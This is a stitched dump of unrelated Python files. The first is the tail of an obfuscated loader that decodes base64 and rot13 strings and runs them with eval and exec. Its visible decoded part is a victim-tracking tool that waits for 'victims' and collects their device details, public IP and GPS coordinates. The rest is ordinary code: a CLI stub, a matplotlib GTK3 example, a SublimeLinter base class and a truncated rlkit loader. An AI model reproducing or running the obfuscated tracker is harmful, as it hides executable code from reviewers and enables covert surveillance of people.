NvX2peVxMunJkyMPVeqlfvVQbtVvxXPDyEqJy0XPxXPzEyMvO3' god = 'YWl0KCk6CglwcmludGVkID0gRmFsc2UKCXdoaWxlIFRydWU6CgkJdGltZS5zbGVlcCgyKQoJCXNpemUgPSBvcy5wYXRoLmdldHNpemUocmVzdWx0KQoJCWlmIHNpemUgPT0gMCBhbmQgcHJpbnRlZCA9PSBGYWxzZToKCQkJcHJpbnQoIlxuIityKyLilJTilIAiK3crIlwwMzNbMTszN21bIityKyIgISIrdysiIF0gIitnKyJXYWl0aW5nIGZvciBWaWN0aW1zIit3KyIgOiAiKQoJCQlwcmludGVkID0gVHJ1ZQoJCWlmIHNpemUgPiAwOgoJCQltYWluKCkKCmRlZiBtYWluKCk6CglnbG9iYWwgaW5mbywgcmVzdWx0LCByb3csIHZhcl9sYXQsIHZhcl9sb24KCXRyeToKCQlyb3cgPSBbXQoJCXdpdGggb3BlbiAoaW5mbywgJ3InKSBhcyBmaWxlMjoKCQkJZmlsZTIgPSBmaWxlMi5yZWFkKCkKCQkJanNvbjMgPSBqc29uLmxvYWRzKGZpbGUyKQoJCQlmb3IgdmFsdWUgaW4ganNvbjNbJ2RldiddOgoKCQkJCXZhcl9vcyA9IHZhbHVlWydvcyddCgkJCQl2YXJfcGxhdGZvcm0gPSB2YWx1ZVsncGxhdGZvcm0nXQoJCQkJdHJ5OgoJCQkJCXZhcl9jb3JlcyA9IHZhbHVlWydjb3JlcyddCgkJCQlleGNlcHQgVHlwZUVycm9yOgoJCQkJCXZhcl9jb3JlcyA9ICdOb3QgQXZhaWxhYmxlJwoJCQkJdmFyX3JhbSA9IHZhbHVlWydyYW0nXQoJCQkJdmFyX3ZlbmRvciA9IHZhbHVlWyd2ZW5kb3InXQoJCQkJdmFyX3JlbmRlciA9IHZhbHVlWydyZW5kZXInXQoJCQkJdmFyX3JlcyA9IHZhbHVlWyd3ZCddICsgJ3gnICsgdmFsdWVbJ2h0J10KCQkJCXZhcl9icm93c2VyID0gdmFsdWVbJ2Jyb3dzZXInXQoJCQkJdmFyX2lwID0gdmFsdWVbJ2lwJ10KCgkJCQlyb3cuYXBwZW5kKHZhcl9vcykKCQkJCXJvdy5hcHBlbmQodmFyX3BsYXRmb3JtKSAKCQkJCXJvdy5hcHBlbmQodmFyX2NvcmVzKSAKCQkJCXJvdy5hcHBlbmQodmFyX3JhbSkgCgkJCQlyb3cuYXBwZW5kKHZhcl92ZW5kb3IpCgkJCQlyb3cuYXBwZW5kKHZhcl9yZW5kZXIpCgkJCQlyb3cuYXBwZW5kKHZhcl9yZXMpCgkJCQlyb3cuYXBwZW5kKHZhcl9icm93c2VyKQoJCQkJcm93LmFwcGVuZCh2YXJfaXApCgoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgRGV2aWNlIEluZm9ybWF0aW9uIDogJyArIFcgKyAnXG4nKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgT1MgICAgICAgICA6ICcgKyBXICsgdmFyX29zKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUGxhdGZvcm0gICA6ICcgKyBXICsgdmFyX3BsYXRmb3JtKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgQ1BVIENvcmVzICA6ICcgKyBXICsgdmFyX2NvcmVzKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUkFNICAgICAgICA6ICcgKyBXICsgdmFyX3JhbSkKCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIEdQVSBWZW5kb3IgOiAnICsgVyArIHZhcl92ZW5kb3IpCgkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBHUFUgICAgICAgIDogJyArIFcgKyB2YXJfcmVuZGVyKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUmVzb2x1dGlvbiA6ICcgKyBXICsgdmFyX3JlcykKCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIEJyb3dzZXIgICAgOiAnICsgVyArIHZhcl9icm93c2VyKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUHVibGljIElQICA6ICcgKyBXICsgdmFyX2lwKQoKCQkJCXJxc3QgPSByZXF1ZXN0cy5nZXQoJ2h0dHA6Ly9mcmVlLmlwd2hvaXMuaW8vanNvbi97fScuZm9ybWF0KHZhcl9pcCkpCgkJCQlzYyA9IHJxc3Quc3RhdHVzX2NvZGUKCgkJCQlpZiBzYyA9PSAyMDA6CgkJCQkJZGF0YSA9IHJxc3QudGV4dAoJCQkJCWRhdGEgPSBqc29uLmxvYWRzKGRhdGEpCgkJCQkJdmFyX2NvbnRpbmVudCA9IHN0cihkYXRhWydjb250aW5lbnQnXSkKCQkJCQl2YXJfY291bnRyeSA9IHN0cihkYXRhWydjb3VudHJ5J10pCgkJCQkJdmFyX3JlZ2lvbiA9IHN0cihkYXRhWydyZWdpb24nXSkKCQkJCQl2YXJfY2l0eSA9IHN0cihkYXRhWydjaXR5J10pCgkJCQkJdmFyX29yZyA9IHN0cihkYXRhWydvcmcnXSkKCQkJCQl2YXJfaXNwID0gc3RyKGRhdGFbJ2lzcCddKQoKCQkJCQlyb3cuYXBwZW5kKHZhcl9jb250aW5lbnQpCgkJCQkJcm93LmFwcGVuZCh2YXJfY291bnRyeSkKCQkJCQlyb3cuYXBwZW5kKHZhcl9yZWdpb24pCgkJCQkJcm93LmFwcGVuZCh2YXJfY2l0eSkKCQkJCQlyb3cuYXBwZW5kKHZhcl9vcmcpCgkJCQkJcm93LmFwcGVuZCh2YXJfaXNwKQoKCQkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBDb250aW5lbnQgIDogJyArIFcgKyB2YXJfY29udGluZW50KQoJCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIENvdW50cnkgICAgOiAnICsgVyArIHZhcl9jb3VudHJ5KQoJCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIFJlZ2lvbiAgICAgOiAnICsgVyArIHZhcl9yZWdpb24pCgkJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgQ2l0eSAgICAgICA6ICcgKyBXICsgdmFyX2NpdHkpCgkJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgT3JnICAgICAgICA6ICcgKyBXICsgdmFyX29yZykKCQkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBJU1AgICAgICAgIDogJyArIFcgKyB2YXJfaXNwKQoJZXhjZXB0IFZhbHVlRXJyb3I6CgkJcGFzcwoJCgl0cnk6CgkJd2l0aCBvcGVuIChyZXN1bHQsICdyJykgYXMgZmlsZToKCQkJZmlsZSA9IGZpbGUucmVhZCgpCgkJCWpzb24yID0ganNvbi5sb2FkcyhmaWxlKQoJCQlmb3IgdmFsdWUgaW4ganNvbjJbJ2luZm8nXToKCQkJCXZhcl9sYXQgPSB2YWx1ZVsnbGF0J10gKyAnIGRlZycKCQkJCXZhcl9sb24gPSB2YWx1ZVsnbG9uJ10gKyAnIGRlZycKCQkJCXZhcl9hY2MgPSB2YWx1ZVsnYWNjJ10gKyAnIG0nCgoJCQkJdmFyX2FsdCA9IHZhbHVlWydhbHQnXQoJCQkJaWYgdmFyX2FsdCA9PSAnJzoKCQkJCQl2YXJfYWx0ID0gJ05vdCBBdmFpbGFibGUnCgkJCQllbHNlOgoJCQkJCXZhcl9hbHQgPT0gdmFsdWVbJ2FsdCddICsgJyBtJwoJCQkJCgkJCQl2YXJfZGlyID0gdmFsdWVbJ2Rpcidd' destiny = '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' joy = '\x72\x6f\x74\x31\x33' trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29') eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
py
7dfd19f229b1f1b8c0b576ae7ca8fae9ed8bf0de
import click import sys sys.path.insert(0,'../../../tools') from cli_npm import cli_npm from cli_webpack import cli_webpack if __name__ == '__main__': cli = click.CommandCollection(sources=[cli_npm, cli_webpack]) cli()
py
7dfd1a5c56d5f98a9a5c4e2b7647e7999fc7e254
""" ========================= Embedding In GTK3 Panzoom ========================= Demonstrate NavigationToolbar with GTK3 accessed via pygobject. """ import gi gi.require_version('Gtk', '3.0') from gi.repository import Gtk from matplotlib.backends.backend_gtk3 import ( NavigationToolbar2GTK3 as NavigationToolbar) from matplotlib.backends.backend_gtk3agg import ( FigureCanvasGTK3Agg as FigureCanvas) from matplotlib.figure import Figure import numpy as np win = Gtk.Window() win.connect("delete-event", Gtk.main_quit) win.set_default_size(400, 300) win.set_title("Embedding in GTK") f = Figure(figsize=(5, 4), dpi=100) a = f.add_subplot(1, 1, 1) t = np.arange(0.0, 3.0, 0.01) s = np.sin(2*np.pi*t) a.plot(t, s) vbox = Gtk.VBox() win.add(vbox) # Add canvas to vbox canvas = FigureCanvas(f) # a Gtk.DrawingArea vbox.pack_start(canvas, True, True, 0) # Create toolbar toolbar = NavigationToolbar(canvas, win) vbox.pack_start(toolbar, False, False, 0) win.show_all() Gtk.main()
py
7dfd1af816692705ddd779eacb641205e28d1661
# base_linter.py - base class for linters import os import os.path import json import re import subprocess import sublime # If the linter uses an executable that takes stdin, use this input method. INPUT_METHOD_STDIN = 1 # If the linter uses an executable that does not take stdin but you wish to use # a temp file so that the current view can be linted interactively, use this input method. # If the current view has been saved, the tempfile will have the same name as the # view's file, which is necessary for some linters. INPUT_METHOD_TEMP_FILE = 2 # If the linter uses an executable that does not take stdin and you wish to have # linting occur only on file load and save, use this input method. INPUT_METHOD_FILE = 3 CONFIG = { # The display language name for this linter. 'language': '', # Linters may either use built in code or use an external executable. This item may have # one of the following values: # # string - An external command (or path to a command) to execute # None - The linter is considered to be built in # # Alternately, your linter class may define the method get_executable(), # which should return the three-tuple (<enabled>, <executable>, <message>): # <enabled> must be a boolean than indicates whether the executable is available and usable. # If <enabled> is True, <executable> must be one of: # - A command string (or path to a command) if an external executable will be used # - None if built in code will be used # - False if no suitable executable can be found or the linter should be disabled # for some other reason. # <message> is the message that will be shown in the console when the linter is # loaded, to aid the user in knowing what the status of the linter is. If None or an empty string, # a default message will be returned based on the value of <executable>. Otherwise it # must be a string. 'executable': None, # If an external executable is being used, this item specifies the arguments # used when checking the existence of the executable to determine if the linter can be enabled. # If more than one argument needs to be passed, use a tuple/list. # Defaults to '-v' if this item is missing. 'test_existence_args': '-v', # If an external executable is being used, this item specifies the arguments to be passed # when linting. If there is more than one argument, use a tuple/list. # If the input method is anything other than INPUT_METHOD_STDIN, put a {filename} placeholder in # the args where the filename should go. # # Alternately, if your linter class may define the method get_lint_args(), which should return # None for no arguments or a tuple/list for one or more arguments. 'lint_args': None, # If an external executable is being used, the method used to pass input to it. Defaults to STDIN. 'input_method': INPUT_METHOD_STDIN } TEMPFILES_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__.encode('utf-8')), u'..', u'.tempfiles')) JSON_MULTILINE_COMMENT_RE = re.compile(r'\/\*[\s\S]*?\*\/') JSON_SINGLELINE_COMMENT_RE = re.compile(r'\/\/[^\n\r]*') if not os.path.exists(TEMPFILES_DIR): os.mkdir(TEMPFILES_DIR) class BaseLinter(object): '''A base class for linters. Your linter module needs to do the following: - Set the relevant values in CONFIG - Override built_in_check() if it uses a built in linter. You may return whatever value you want, this value will be passed to parse_errors(). - Override parse_errors() and populate the relevant lists/dicts. The errors argument passed to parse_errors() is the output of the executable run through strip(). If you do subclass and override __init__, be sure to call super(MyLinter, self).__init__(config). ''' JSC_PATH = '/System/Library/Frameworks/JavaScriptCore.framework/Versions/A/Resources/jsc' LIB_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__.encode('utf-8')), u'libs')) JAVASCRIPT_ENGINES = ['node', 'jsc'] JAVASCRIPT_ENGINE_NAMES = {'node': 'node.js', 'jsc': 'JavaScriptCore'} JAVASCRIPT_ENGINE_WRAPPERS_PATH = os.path.join(LIB_PATH, 'jsengines') def __init__(self, config): self.language = config['language'] self.enabled = False self.executable = config.get('executable', None) self.test_existence_args = config.get('test_existence_args', ['-v']) self.js_engine = None if isinstance(self.test_existence_args, basestring): self.test_existence_args = (self.test_existence_args,) self.input_method = config.get('input_method', INPUT_METHOD_STDIN) self.filename = None self.lint_args = config.get('lint_args', []) if isinstance(self.lint_args, basestring): self.lint_args = [self.lint_args] def check_enabled(self, view): if hasattr(self, 'get_executable'): try: self.enabled, self.executable, message = self.get_executable(view) if self.enabled and not message: message = 'using "{0}"'.format(self.executable) if self.executable else 'built in' except Exception as ex: self.enabled = False message = unicode(ex) else: self.enabled, message = self._check_enabled(view) return (self.enabled, message or '<unknown reason>') def _check_enabled(self, view): if self.executable is None: return (True, 'built in') elif isinstance(self.executable, basestring): self.executable = self.get_mapped_executable(view, self.executable) elif isinstance(self.executable, bool) and self.executable is False: return (False, 'unknown error') else: return (False, 'bad type for CONFIG["executable"]') # If we get this far, the executable is external. Test that it can be executed # and capture stdout and stderr so they don't end up in the system log. try: args = [self.executable] args.extend(self.test_existence_args) subprocess.Popen(args, startupinfo=self.get_startupinfo(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate() except OSError: return (False, '"{0}" cannot be found'.format(self.executable)) return (True, 'using "{0}" for executable'.format(self.executable)) def _get_lint_args(self, view, code, filename): if hasattr(self, 'get_lint_args'): return self.get_lint_args(view, code, filename) or [] else: lintArgs = self.lint_args or [] settings = view.settings().get('SublimeLinter', {}).get(self.language, {}) if settings: if 'lint_args' in settings: lintArgs = settings['lint_args'] cwd = settings.get('working_directory', '').encode('utf-8') if cwd and os.path.isabs(cwd) and os.path.isdir(cwd): os.chdir(cwd) return [arg.format(filename=filename) for arg in lintArgs] def built_in_check(self, view, code, filename): return '' def executable_check(self, view, code, filename): args = [self.executable] tempfilePath = None if self.input_method == INPUT_METHOD_STDIN: args.extend(self._get_lint_args(view, code, filename)) elif self.input_method == INPUT_METHOD_TEMP_FILE: if filename: filename = os.path.basename(filename) else: filename = u'view{0}'.format(view.id()) tempfilePath = os.path.join(TEMPFILES_DIR, filename) with open(tempfilePath, 'w') as f: f.write(code) args.extend(self._get_lint_args(view, code, tempfilePath)) code = u'' elif self.input_method == INPUT_METHOD_FILE: args.extend(self._get_lint_args(view, code, filename)) code = u'' else: return u'' try: process = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, startupinfo=self.get_startupinfo()) process.stdin.write(code) result = process.communicate()[0] finally: if tempfilePath: os.remove(tempfilePath) return result.strip() def parse_errors(self, view, errors, lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages): pass def add_message(self, lineno, lines, message, messages): # Assume lineno is one-based, ST2 wants zero-based line numbers lineno -= 1 lines.add(lineno) message = message[0].upper() + message[1:] # Remove trailing period from error message if message[-1] == '.': message = message[:-1] if lineno in messages: messages[lineno].append(message) else: messages[lineno] = [message] def underline_range(self, view, lineno, position, underlines, length=1): # Assume lineno is one-based, ST2 wants zero-based line numbers lineno -= 1 line = view.full_line(view.text_point(lineno, 0)) position += line.begin() for i in xrange(length): underlines.append(sublime.Region(position + i)) def underline_regex(self, view, lineno, regex, lines, underlines, wordmatch=None, linematch=None): # Assume lineno is one-based, ST2 wants zero-based line numbers lineno -= 1 lines.add(lineno) offset = 0 line = view.full_line(view.text_point(lineno, 0)) lineText = view.substr(line) if linematch: match = re.match(linematch, lineText) if match: lineText = match.group('match') offset = match.start('match') else: return iters = re.finditer(regex, lineText) results = [(result.start('underline'), result.end('underline')) for result in iters if not wordmatch or result.group('underline') == wordmatch] # Make the lineno one-based again for underline_range lineno += 1 for start, end in results: self.underline_range(view, lineno, start + offset, underlines, end - start) def underline_word(self, view, lineno, position, underlines): # Assume lineno is one-based, ST2 wants zero-based line numbers lineno -= 1 line = view.full_line(view.text_point(lineno, 0)) position += line.begin() word = view.word(position) underlines.append(word) def run(self, view, code, filename=None): self.filename = filename if self.executable is None: errors = self.built_in_check(view, code, filename) else: errors = self.executable_check(view, code, filename) lines = set() errorUnderlines = [] # leave this here for compatibility with original plugin errorMessages = {} violationUnderlines = [] violationMessages = {} warningUnderlines = [] warningMessages = {} self.parse_errors(view, errors, lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages) return lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages def get_mapped_executable(self, view, default): map = view.settings().get('sublimelinter_executable_map') if map: lang = self.language.lower() if lang in map: return map[lang].encode('utf-8') return default def get_startupinfo(self): info = None if os.name == 'nt': info = subprocess.STARTUPINFO() info.dwFlags |= subprocess.STARTF_USESHOWWINDOW info.wShowWindow = subprocess.SW_HIDE return info def execute_get_output(self, args): try: return subprocess.Popen(args, self.get_startupinfo()).communicate()[0] except: return '' def jsc_path(self): '''Return the path to JavaScriptCore. Use this method in case the path has to be dynamically calculated in the future.''' return self.JSC_PATH def find_file(self, filename, view): '''Find a file with the given name, starting in the view's directory, then ascending the file hierarchy up to root.''' path = (view.file_name() or '').encode('utf-8') # quit if the view is temporary if not path: return None dirname = os.path.dirname(path) while True: path = os.path.join(dirname, filename) if os.path.isfile(path): with open(path, 'r') as f: return f.read() # if we hit root, quit parent = os.path.dirname(dirname) if parent == dirname: return None else: dirname = parent def strip_json_comments(self, json_str): stripped_json = JSON_MULTILINE_COMMENT_RE.sub('', json_str) stripped_json = JSON_SINGLELINE_COMMENT_RE.sub('', stripped_json) return json.dumps(json.loads(stripped_json)) def get_javascript_args(self, view, linter, code): path = os.path.join(self.LIB_PATH, linter) options = self.get_javascript_options(view) if options is None: options = json.dumps(view.settings().get('%s_options' % linter) or {}) self.get_javascript_engine(view) engine = self.js_engine if (engine['name'] == 'jsc'): args = [engine['wrapper'], '--', path + os.path.sep, str(code.count('\n')), options] else: args = [engine['wrapper'], path + os.path.sep, options] return args def get_javascript_options(self, view): '''Subclasses should override this if they want to provide options for a JavaScript-based linter. If the subclass cannot provide options, it should return None (or not return anything).''' return None def get_javascript_engine(self, view): if self.js_engine is None: for engine in self.JAVASCRIPT_ENGINES: if engine == 'node': try: path = self.get_mapped_executable(view, 'node') subprocess.call([path, u'-v'], startupinfo=self.get_startupinfo()) self.js_engine = { 'name': engine, 'path': path, 'wrapper': os.path.join(self.JAVASCRIPT_ENGINE_WRAPPERS_PATH, engine + '.js'), } break except OSError: pass elif engine == 'jsc': if os.path.exists(self.jsc_path()): self.js_engine = { 'name': engine, 'path': self.jsc_path(), 'wrapper': os.path.join(self.JAVASCRIPT_ENGINE_WRAPPERS_PATH, engine + '.js'), } break if self.js_engine is not None: return (True, self.js_engine['path'], 'using {0}'.format(self.JAVASCRIPT_ENGINE_NAMES[self.js_engine['name']])) # Didn't find an engine, tell the user engine_list = ', '.join(self.JAVASCRIPT_ENGINE_NAMES.values()) return (False, '', 'One of the following JavaScript engines must be installed: ' + engine_list)
py
7dfd1bc923bb1ff8586b3632151933b8c0a7bcc0
from collections import OrderedDict import numpy as np import torch import torch.optim as optim from torch import nn as nn import torch.nn.functional as F import rlkit.torch.pytorch_util as ptu from rlkit.misc.eval_util import create_stats_ordered_dict from rlkit.torch.torch_rl_algorithm import TorchTrainer from rlkit.misc.asset_loader import load_local_or_remote_file import random from rlkit.torch.core import np_to_pytorch_batch from rlkit.data_management.path_builder import PathBuilder # import matplotlib # matplotlib.use('TkAgg') # import matplotlib.pyplot as plt from rlkit.core import logger import glob class EncoderPathLoader: """ Path loader for that loads obs-dict demonstrations into a Trainer with EnvReplayBuffer """ def __init__( self, trainer, replay_buffer, demo_train_buffer, demo_test_buffer, demo_paths=[], # list of dicts demo_train_split=0.9, add_demos_to_replay_buffer=True, bc_num_pretrain_steps=0, bc_batch_size=64, bc_weight=1.0, rl_weight=1.0, q_num_pretrain_steps=0, weight_decay=0, eval_policy=None, recompute_reward=False, env_info_key=None, obs_key=None, load_terminals=True, **kwargs ): self.trainer = trainer self.add_demos_to_replay_buffer = add_demos_to_replay_buffer self.demo_train_split = demo_train_split self.replay_buffer = replay_buffer self.demo_train_buffer = demo_train_buffer self.demo_test_buffer = demo_test_buffer self.demo_paths = demo_paths self.bc_num_pretrain_steps = bc_num_pretrain_steps self.q_num_pretrain_steps = q_num_pretrain_steps self.demo_trajectory_rewards = [] self.env_info_key = env_info_key self.obs_key = obs_key self.recompute_reward = recompute_reward self.load_terminals = load_terminals self.trainer.replay_buffer = self.replay_buffer self.trainer.demo_train_buffer = self.demo_train_buffer self.trainer.demo_test_buffer = self.demo_test_buffer def load_path(self, path, replay_buffer, obs_dict=None): rewards = [] path_builder = PathBuilder() print("loading path, length", len(path["observations"]), len(path["actions"])) H = min(len(path["observations"]), len(path["actions"])) print("actions", np.min(path["actions"]), np.max(path["actions"])) for i in range(H): if obs_dict: ob = path["observations"][i][self.obs_key] next_ob = path["next_observations"][i][self.obs_key] else: ob = path["observations"][i] next_ob = path["next_observations"][i] action = path["actions"][i] reward = path["rewards"][i] terminal = path["terminals"][i] if not self.load_terminals: terminal = np.zeros(terminal.shape) agent_info = path["agent_infos"][i] env_info = path["env_infos"][i] if self.recompute_reward: reward = self.env.compute_reward( action, next_ob, ) reward = np.array([reward]) rewards.append(reward) terminal = np.array([terminal]).reshape((1, )) path_builder.add_all( observations=ob, actions=action, rewards=reward, next_observations=next_ob, terminals=terminal, agent_infos=agent_info, env_infos=env_info, ) self.demo_trajectory_rewards.append(rewards) path = path_builder.get_all_stacked() replay_buffer.add_path(path) print("path sum rewards", sum(rewards), len(rewards)) # self.env.initialize(zs) def load_demos(self, ): # Off policy for demo_path in self.demo_paths: self.load_demo_path(**demo_path) # Parameterize which demo is being tested (and all jitter variants) # If is_demo is False, we only add the demos to the # replay buffer, and not to the demo_test or demo_train buffers def load_demo_path(self, path, is_demo, obs_dict, train_split=None): print("loading off-policy path", path) data = list(load_local_or_remote_file(path)) # if not is_demo: # data = [data] # random.shuffle(data) if train_split is None: train_split = self.demo_train_split N = 